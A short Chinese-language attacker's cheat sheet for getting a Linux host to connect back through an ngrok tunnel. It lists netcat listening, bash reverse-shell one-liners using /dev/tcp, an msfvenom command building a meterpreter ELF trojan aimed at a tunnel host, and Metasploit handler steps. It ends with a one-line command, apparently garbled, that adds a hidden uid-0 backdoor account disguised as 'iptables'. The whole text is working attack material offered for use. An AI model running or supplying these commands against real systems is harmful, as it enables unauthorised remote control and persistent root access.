linux本地配合ngrok内网穿透生成,liunx上线
反弹shell
本地监听
nc -lvvp 4444
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
exec 8<>/dev/tcp/127.0.0.19/4444;bash<&8 >&8 2>&8
生成liunx马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=隧道端口 -f elf >f.elf
配置监听
1.use exploit/multi/handler
2.set payload linux/x86/meterpreter/reverse_tcp
3.set lhost (和ngrok上面配置一样)
4.set lport(和ngrok上面配置一样)
5.run -j
ngrok命令
./sunny clientid 隧道id
运行木马即可上线
后渗透代补充
useradd -p openssl passwd -1 -salt 'lsof' admin123
-u 0 -o -g root -G root -s /bin/bash -d /usr/bin/iptabies iptables 非交互式一句话添加root用户